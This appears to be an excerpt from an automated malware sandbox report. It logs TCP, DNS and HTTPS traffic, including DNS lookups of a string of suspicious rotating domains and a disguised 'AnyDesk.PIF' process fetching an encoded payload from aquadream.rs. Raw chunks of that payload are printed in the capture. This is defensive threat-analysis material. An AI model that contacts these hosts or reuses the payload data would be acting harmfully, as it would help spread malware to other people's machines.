                                                                                                                                                                      Nov 27, 2024 13:22:17.330856085 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.333426952 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.333528996 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.337060928 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.337137938 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.413208961 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.413320065 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.416529894 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.416613102 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.419856071 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.419929981 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.422437906 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.422629118 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.426599979 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.426671982 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.429785013 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.429857969 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.433190107 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.433268070 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.438838959 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.438966990 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.441067934 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.441154003 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.444658041 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.444744110 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.447865963 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.447942972 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.451034069 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.451133013 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.454694033 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.454770088 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.458923101 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.459001064 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.528954983 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.529078960 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.532104969 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.532215118 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.534401894 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.534473896 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.616187096 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.616261959 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.618582010 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.618650913 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.621217012 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.621283054 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.624629021 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.624728918 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.627320051 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.627397060 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.630031109 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.630101919 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.632684946 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.632752895 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.636096001 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.636157990 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.638756037 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.638905048 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.641805887 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.641875982 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.644483089 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.644582987 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.647260904 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.647337914 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.650621891 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.650687933 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.728921890 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.728996992 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.732031107 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.732104063 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.733846903 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.733911037 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.816417933 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.816534996 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.818706036 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.818782091 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.821357012 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.821425915 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.823683023 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.823851109 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.826839924 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.827018023 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.829463959 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.829576015 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.831871033 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.831934929 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.833350897 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.833422899 CET44349706185.102.77.43192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:22:17.833424091 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.833470106 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.834398985 CET49706443192.168.2.8185.102.77.43
                                                                                                                                                                      Nov 27, 2024 13:22:17.834419966 CET44349706185.102.77.43192.168.2.8

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 27, 2024 13:22:13.126774073 CET5879253192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:22:13.774569035 CET53587921.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:23:00.085829020 CET5564253192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:23:00.345024109 CET53556421.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:23:20.084678888 CET5789353192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:23:20.309747934 CET53578931.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:23:39.522061110 CET5275153192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:23:39.742459059 CET53527511.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:23:59.678164005 CET6186253192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:24:00.002156019 CET53618621.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:24:20.180763960 CET5491253192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:24:20.492485046 CET53549121.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:24:40.632680893 CET5345753192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:24:40.860418081 CET53534571.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:25:01.084328890 CET5779353192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:25:01.324996948 CET53577931.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:25:22.010665894 CET5955353192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:25:22.249058008 CET53595531.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:25:43.407754898 CET5289053192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:25:43.708264112 CET53528901.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:26:26.568842888 CET5971153192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:26:26.793922901 CET53597111.1.1.1192.168.2.8
                                                                                                                                                                      Nov 27, 2024 13:26:46.943116903 CET6397853192.168.2.81.1.1.1
                                                                                                                                                                      Nov 27, 2024 13:26:47.190737009 CET53639781.1.1.1192.168.2.8

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 27, 2024 13:22:13.126774073 CET192.168.2.81.1.1.10xff8aStandard query (0)aquadream.rsA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:23:00.085829020 CET192.168.2.81.1.1.10xddfdStandard query (0)www.ustavoglins.storeA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:23:20.084678888 CET192.168.2.81.1.1.10x43dbStandard query (0)www.estspacefox.shopA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:23:39.522061110 CET192.168.2.81.1.1.10xb78cStandard query (0)www.ebsiteclients.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:23:59.678164005 CET192.168.2.81.1.1.10x1620Standard query (0)www.rnuah.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:24:20.180763960 CET192.168.2.81.1.1.10xa302Standard query (0)www.atingdilse.siteA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:24:40.632680893 CET192.168.2.81.1.1.10xa08eStandard query (0)www.askabirokulmumkun.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:25:01.084328890 CET192.168.2.81.1.1.10x1f3fStandard query (0)www.ultangaziescortbayanlari.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:25:22.010665894 CET192.168.2.81.1.1.10xdbcStandard query (0)www.yzsports200.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:25:43.407754898 CET192.168.2.81.1.1.10x8443Standard query (0)www.evelupcasino.clubA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:26:26.568842888 CET192.168.2.81.1.1.10xd6e5Standard query (0)www.trl-migrate.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:26:46.943116903 CET192.168.2.81.1.1.10x6febStandard query (0)www.9838.xyzA (IP address)IN (0x0001)false

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 27, 2024 13:22:13.774569035 CET1.1.1.1192.168.2.80xff8aNo error (0)aquadream.rs185.102.77.43A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:23:00.345024109 CET1.1.1.1192.168.2.80xddfdName error (3)www.ustavoglins.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:23:20.309747934 CET1.1.1.1192.168.2.80x43dbName error (3)www.estspacefox.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:23:39.742459059 CET1.1.1.1192.168.2.80xb78cName error (3)www.ebsiteclients.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:24:00.002156019 CET1.1.1.1192.168.2.80x1620Name error (3)www.rnuah.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:24:20.492485046 CET1.1.1.1192.168.2.80xa302Name error (3)www.atingdilse.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:24:40.860418081 CET1.1.1.1192.168.2.80xa08eName error (3)www.askabirokulmumkun.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:25:01.324996948 CET1.1.1.1192.168.2.80x1f3fName error (3)www.ultangaziescortbayanlari.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:25:22.249058008 CET1.1.1.1192.168.2.80xdbcName error (3)www.yzsports200.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:25:43.708264112 CET1.1.1.1192.168.2.80x8443Name error (3)www.evelupcasino.clubnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:26:26.793922901 CET1.1.1.1192.168.2.80xd6e5Name error (3)www.trl-migrate.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 27, 2024 13:26:47.190737009 CET1.1.1.1192.168.2.80x6febName error (3)www.9838.xyznonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • aquadream.rs

                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.849706185.102.77.434438064C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-27 12:22:15 UTC161OUTGET /244_Ipkokioahlp HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                      Host: aquadream.rs
                                                                                                                                                                      2024-11-27 12:22:16 UTC201INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Wed, 27 Nov 2024 12:22:16 GMT
                                                                                                                                                                      Server: Apache
                                                                                                                                                                      Last-Modified: Tue, 26 Nov 2024 09:38:57 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 659232
                                                                                                                                                                      Vary: User-Agent
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-11-27 12:22:16 UTC7991INData Raw: 73 62 6d 77 5a 43 36 79 76 46 59 63 49 79 45 6b 49 53 55 61 49 43 59 70 4b 79 6b 65 4c 52 38 6a 4d 53 30 73 4b 53 6b 76 4d 42 30 6b 4c 43 6f 63 48 79 49 5a 4b 43 34 6f 4b 69 55 75 4a 53 59 6a 4c 54 49 76 4c 79 59 75 4b 43 55 5a 4a 53 49 73 4b 68 73 63 49 68 30 74 4a 42 73 73 48 43 49 65 49 52 6f 74 47 79 77 70 48 69 49 71 4a 79 55 6b 4c 79 49 6b 48 43 73 79 4d 42 30 66 4c 69 6b 75 49 78 34 64 47 69 6b 76 4d 53 51 62 4b 69 38 6c 4a 69 49 75 47 62 47 35 73 47 51 75 73 72 78 57 58 79 67 6a 4a 79 4d 68 4a 78 6b 67 4a 43 69 78 75 62 42 6b 4c 72 4b 38 56 74 4c 4c 7a 63 72 4e 79 64 54 4f 79 4f 58 6a 35 64 44 68 7a 38 76 64 34 65 4c 6c 35 64 2f 65 30 63 72 69 35 4e 4c 50 7a 4e 58 6d 34 4f 62 6b 79 65 44 4a 79 4d 76 68 33 4e 2f 66 79 4f 44 6d 79 64 58 4a 7a 4f 4c
                                                                                                                                                                      Data Ascii: sbmwZC6yvFYcIyEkISUaICYpKykeLR8jMS0sKSkvMB0kLCocHyIZKC4oKiUuJSYjLTIvLyYuKCUZJSIsKhscIh0tJBssHCIeIRotGywpHiIqJyUkLyIkHCsyMB0fLikuIx4dGikvMSQbKi8lJiIuGbG5sGQusrxWXygjJyMhJxkgJCixubBkLrK8VtLLzcrNydTOyOXj5dDhz8vd4eLl5d/e0cri5NLPzNXm4ObkyeDJyMvh3N/fyODmydXJzOL
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 62 76 4f 4f 39 58 52 33 75 4b 47 38 52 6d 69 38 59 6b 38 71 63 5a 36 50 57 34 72 6a 65 72 63 30 52 57 34 46 47 32 63 39 50 51 61 75 62 41 2f 43 52 54 44 57 32 64 7a 6b 37 68 49 5a 68 63 77 71 46 63 39 4c 41 6a 4d 32 48 37 42 4c 54 45 61 6c 4b 45 37 71 76 33 2f 5a 30 6b 56 77 4c 63 64 6e 53 47 6d 6e 70 75 4c 72 71 73 4e 38 32 66 53 30 46 4a 4a 69 6d 65 36 38 7a 78 6d 70 55 74 38 53 4c 7a 34 50 32 35 34 4d 79 37 42 4f 61 31 61 45 70 4b 77 48 71 43 62 5a 32 55 4a 71 54 35 74 6f 53 70 54 57 4a 62 63 58 46 67 35 62 73 63 4a 58 6e 31 4f 59 47 70 72 70 4b 38 78 7a 47 7a 32 58 47 76 78 36 2f 4d 4b 77 57 2f 52 64 77 7a 49 66 41 76 6c 35 64 4b 73 72 7a 4b 68 34 73 70 6a 63 44 54 66 75 58 75 77 32 77 6e 2b 47 5a 66 75 59 2f 6f 45 59 2b 49 31 2b 53 4e 4a 4a 55 5a 30
                                                                                                                                                                      Data Ascii: bvOO9XR3uKG8Rmi8Yk8qcZ6PW4rjerc0RW4FG2c9PQaubA/CRTDW2dzk7hIZhcwqFc9LAjM2H7BLTEalKE7qv3/Z0kVwLcdnSGmnpuLrqsN82fS0FJJime68zxmpUt8SLz4P254My7BOa1aEpKwHqCbZ2UJqT5toSpTWJbcXFg5bscJXn1OYGprpK8xzGz2XGvx6/MKwW/RdwzIfAvl5dKsrzKh4spjcDTfuXuw2wn+GZfuY/oEY+I1+SNJJUZ0
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 51 34 79 36 6d 66 70 49 6c 47 6d 7a 6a 77 44 55 76 69 49 55 41 6b 34 42 4e 79 39 34 78 63 63 65 65 64 2b 68 4b 47 72 4c 39 7a 4b 6a 7a 50 5a 77 51 47 52 33 57 4c 44 43 4e 48 57 66 64 43 34 48 35 49 4e 7a 75 77 5a 65 4a 44 43 76 6b 75 7a 36 33 2f 57 4c 43 38 6e 73 78 37 4b 64 49 68 2f 31 76 75 38 4d 6f 4b 76 49 67 77 35 4b 6c 2f 67 54 78 69 39 42 57 6d 4a 73 62 74 30 73 68 69 53 4f 57 75 51 35 39 4f 48 75 36 31 50 76 57 4c 6d 54 73 5a 56 43 69 6a 44 65 36 49 78 45 74 4d 64 63 39 58 48 4f 78 75 49 6e 53 50 37 69 70 72 34 4c 6d 52 57 42 45 5a 48 53 65 38 38 62 68 77 74 70 55 74 58 75 4f 78 38 49 53 56 45 66 65 36 47 6f 42 71 47 74 41 34 6f 34 4d 66 33 63 4b 58 63 33 4f 72 73 4f 75 72 49 6f 69 59 4f 6b 30 55 6f 7a 32 65 55 36 71 37 59 33 6f 4a 4a 77 54 4c 70
                                                                                                                                                                      Data Ascii: Q4y6mfpIlGmzjwDUviIUAk4BNy94xcceed+hKGrL9zKjzPZwQGR3WLDCNHWfdC4H5INzuwZeJDCvkuz63/WLC8nsx7KdIh/1vu8MoKvIgw5Kl/gTxi9BWmJsbt0shiSOWuQ59OHu61PvWLmTsZVCijDe6IxEtMdc9XHOxuInSP7ipr4LmRWBEZHSe88bhwtpUtXuOx8ISVEfe6GoBqGtA4o4Mf3cKXc3OrsOurIoiYOk0Uoz2eU6q7Y3oJJwTLp
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 57 55 4f 39 45 51 76 75 41 63 43 53 67 79 42 71 38 66 4f 4d 72 35 35 46 7a 51 39 4f 39 2b 35 59 6c 54 48 78 6e 76 78 2f 52 70 33 77 6a 38 58 68 6c 54 71 76 48 30 79 43 50 64 5a 6a 6c 4d 78 57 6d 56 70 6a 4f 6e 33 6d 79 50 43 73 62 35 6c 31 6f 6d 51 32 48 7a 2f 62 73 7a 46 65 36 5a 79 77 78 6d 74 4d 52 36 38 6d 6d 78 64 56 6e 42 42 56 6d 36 44 63 4a 47 2f 6a 65 4e 77 52 67 6d 55 4f 41 57 43 44 69 46 6d 73 65 46 54 44 75 4d 77 52 62 58 33 71 69 4f 36 39 75 4c 68 71 71 6c 72 4c 35 62 50 79 4d 50 7a 6c 5a 6e 36 33 2f 43 71 58 30 4f 4e 76 6f 64 2b 45 65 47 63 48 59 6c 6c 63 61 48 55 47 33 42 37 42 2b 78 4c 65 59 59 7a 55 38 6c 78 69 65 70 4b 74 4e 50 4c 76 73 42 64 71 64 38 76 4a 52 73 4f 31 78 51 36 6c 52 62 6b 58 41 41 5a 77 6c 44 34 71 64 51 6a 50 57 54 78
                                                                                                                                                                      Data Ascii: WUO9EQvuAcCSgyBq8fOMr55FzQ9O9+5YlTHxnvx/Rp3wj8XhlTqvH0yCPdZjlMxWmVpjOn3myPCsb5l1omQ2Hz/bszFe6ZywxmtMR68mmxdVnBBVm6DcJG/jeNwRgmUOAWCDiFmseFTDuMwRbX3qiO69uLhqqlrL5bPyMPzlZn63/CqX0ONvod+EeGcHYllcaHUG3B7B+xLeYYzU8lxiepKtNPLvsBdqd8vJRsO1xQ6lRbkXAAZwlD4qdQjPWTx
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 78 4f 61 38 35 38 61 4b 50 44 43 68 79 30 41 2b 52 50 74 57 79 42 78 49 55 61 50 35 4a 50 51 6b 47 75 62 61 31 72 36 5a 78 38 64 62 2f 50 41 5a 50 4c 78 73 76 4f 61 34 57 4a 68 63 42 30 78 45 31 79 32 33 39 35 37 63 46 59 4a 30 59 6b 44 78 30 32 70 2f 6b 45 56 7a 48 75 5a 6e 69 57 79 52 41 39 30 36 33 33 59 58 75 49 4d 39 63 55 6f 4c 4e 6d 4e 32 70 31 63 7a 30 55 52 39 33 74 35 75 71 4a 67 63 6c 39 54 42 2f 55 32 33 4b 6c 32 6a 33 43 41 4c 72 5a 77 6e 69 78 77 6f 56 41 32 44 42 62 4c 4b 35 66 55 62 46 38 30 64 53 71 65 6e 34 63 54 53 4c 4b 43 4e 33 46 32 44 64 6f 2f 58 46 52 73 7a 4c 4a 62 38 55 2f 6c 41 72 61 45 55 6d 4c 66 71 43 2b 67 75 7a 76 75 39 74 59 44 7a 64 70 32 64 64 6a 4a 49 39 2f 30 70 48 2b 48 39 57 36 6d 76 68 37 33 76 47 59 79 48 41 6e 4c
                                                                                                                                                                      Data Ascii: xOa858aKPDChy0A+RPtWyBxIUaP5JPQkGuba1r6Zx8db/PAZPLxsvOa4WJhcB0xE1y23957cFYJ0YkDx02p/kEVzHuZniWyRA90633YXuIM9cUoLNmN2p1cz0UR93t5uqJgcl9TB/U23Kl2j3CALrZwnixwoVA2DBbLK5fUbF80dSqen4cTSLKCN3F2Ddo/XFRszLJb8U/lAraEUmLfqC+guzvu9tYDzdp2ddjJI9/0pH+H9W6mvh73vGYyHAnL
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 4c 48 4e 74 32 4d 59 73 79 78 4a 73 52 66 63 79 6e 44 4c 50 38 4b 4e 61 71 73 69 58 69 42 61 68 6d 36 61 39 58 38 53 32 67 77 68 35 42 69 59 69 73 59 4f 58 77 43 6d 38 5a 44 2b 57 48 53 77 76 76 48 56 30 43 30 35 69 4a 71 57 6d 6b 31 33 64 48 6a 36 4e 34 43 34 69 6d 51 43 77 79 6f 46 48 64 6a 6f 78 31 59 6b 76 62 6c 72 69 39 52 63 43 49 37 4d 4a 47 6c 39 4d 6c 61 4d 61 56 58 42 64 67 53 48 34 32 6c 2b 37 4c 6f 43 79 32 4b 6e 67 57 4d 47 6a 49 56 64 66 62 76 74 45 5a 37 32 31 64 6d 6e 35 76 4e 6f 7a 56 42 58 4a 67 75 54 4c 73 4e 39 39 76 6b 49 2f 30 55 6a 76 6a 7a 54 62 58 78 46 32 58 51 44 55 38 31 37 62 70 75 46 76 4f 50 78 78 37 4d 37 38 70 78 65 6e 37 79 64 6c 62 79 30 4e 43 56 63 69 37 4a 57 6b 34 33 67 2f 71 38 4b 72 51 55 5a 4f 50 6d 37 4f 44 6e 30
                                                                                                                                                                      Data Ascii: LHNt2MYsyxJsRfcynDLP8KNaqsiXiBahm6a9X8S2gwh5BiYisYOXwCm8ZD+WHSwvvHV0C05iJqWmk13dHj6N4C4imQCwyoFHdjox1Ykvblri9RcCI7MJGl9MlaMaVXBdgSH42l+7LoCy2KngWMGjIVdfbvtEZ721dmn5vNozVBXJguTLsN99vkI/0UjvjzTbXxF2XQDU817bpuFvOPxx7M78pxen7ydlby0NCVci7JWk43g/q8KrQUZOPm7ODn0
                                                                                                                                                                      2024-11-27 12:22:16 UTC8000INData Raw: 4d 64 7a 33 74 78 77 47 70 79 74 76 79 44 61 51 44 74 44 70 66 6f 57 30 49 66 59 2b 41 39 36 6f 6e 33 77 6b 39 44 6b 42 4b 42 4d 4e 6d 38 35 53 67 6f 63 32 74 31 47 33 62 34 72 4d 6d 48 43 6b 63 38 56 63 56 47 66 36 6f 52 53 44 71 65 31 48 57 74 4c 76 32 53 63 5a 30 59 59 31 59 64 53 75 48 30 6b 6b 55 56 78 75 79 76 53 6a 6e 33 6b 6a 74 65 61 64 36 33 70 6b 4d 4e 4e 78 39 71 42 36 34 6f 6f 62 49 71 77 75 4c 63 32 6d 43 76 49 72 68 71 39 36 61 71 48 58 4e 61 37 63 55 49 64 6f 51 35 6f 35 4f 79 74 71 35 54 38 66 38 58 2b 4b 46 32 75 5a 49 61 64 45 54 54 38 6b 2f 45 67 6e 50 47 53 64 58 48 4f 64 34 77 47 67 77 4f 36 48 67 66 49 33 34 4a 50 46 38 41 36 4a 33 44 6a 73 33 75 5a 6f 4c 56 42 75 66 72 48 34 61 45 49 63 37 73 52 4f 53 53 6d 6c 78 75 77 70 77 75 46
                                                                                                                                                                      Data Ascii: Mdz3txwGpytvyDaQDtDpfoW0IfY+A96on3wk9DkBKBMNm85Sgoc2t1G3b4rMmHCkc8VcVGf6oRSDqe1HWtLv2ScZ0YY1YdSuH0kkUVxuyvSjn3kjtead63pkMNNx9qB64oobIqwuLc2mCvIrhq96aqHXNa7cUIdoQ5o5Oytq5T8f8X+KF2uZIadETT8k/EgnPGSdXHOd4wGgwO6HgfI34JPF8A6J3Djs3uZoLVBufrH4aEIc7sROSSmlxuwpwuF
